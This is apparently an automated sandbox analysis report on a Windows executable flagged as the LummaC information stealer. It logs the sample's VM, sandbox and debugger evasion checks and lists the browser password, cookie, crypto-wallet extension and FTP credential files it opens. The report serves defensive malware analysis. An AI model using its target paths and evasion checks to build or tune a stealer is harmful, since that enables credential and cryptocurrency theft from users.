Source: C:\Users\user\Desktop\JqGBbm7.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\JqGBbm7.exe

Code function: 0_2_00A2C130 rdtsc

0_2_00A2C130

Source: C:\Users\user\Desktop\JqGBbm7.exe TID: 7404	Thread sleep time: -180000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe TID: 7408	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\JqGBbm7.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: JqGBbm7.exe, JqGBbm7.exe, 00000000.00000002.1807079668.0000000000BA5000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: JqGBbm7.exe, 00000000.00000003.1796984446.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000002.1808013073.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1759629623.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1699679879.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1806416714.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1711208127.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1775186132.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1770818531.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: JqGBbm7.exe, 00000000.00000002.1807884478.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, JqGBbm7.exe, 00000000.00000003.1806416714.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx*
Source: JqGBbm7.exe, 00000000.00000002.1807079668.0000000000BA5000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\JqGBbm7.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\JqGBbm7.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\JqGBbm7.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\JqGBbm7.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\JqGBbm7.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\JqGBbm7.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\JqGBbm7.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\JqGBbm7.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\JqGBbm7.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\JqGBbm7.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\JqGBbm7.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: NTICE
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: SICE
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\JqGBbm7.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\JqGBbm7.exe

Code function: 0_2_00A2C130 rdtsc

0_2_00A2C130

Source: C:\Users\user\Desktop\JqGBbm7.exe

Code function: 0_2_00A0BCE0 LdrInitializeThunk,

0_2_00A0BCE0

Source: JqGBbm7.exe, JqGBbm7.exe, 00000000.00000002.1807219700.0000000000BEB000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: /Program Manager

Source: C:\Users\user\Desktop\JqGBbm7.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\JqGBbm7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: JqGBbm7.exe, 00000000.00000003.1775186132.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\JqGBbm7.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: JqGBbm7.exe PID: 7280, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: JqGBbm7.exe, 00000000.00000003.1759629623.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: JqGBbm7.exe, 00000000.00000003.1759629623.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: JqGBbm7.exe, 00000000.00000003.1796984446.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: JqGBbm7.exe, 00000000.00000003.1770760646.0000000000E38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: enllpjcblmjkfcffne","ez":"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnm
Source: JqGBbm7.exe, 00000000.00000003.1759629623.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: JqGBbm7.exe, 00000000.00000003.1740924328.00000000056E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3[
Source: JqGBbm7.exe, 00000000.00000003.1796984446.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: JqGBbm7.exe, 00000000.00000003.1759629623.0000000000DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: JqGBbm7.exe, 00000000.00000003.1760067727.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\JqGBbm7.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

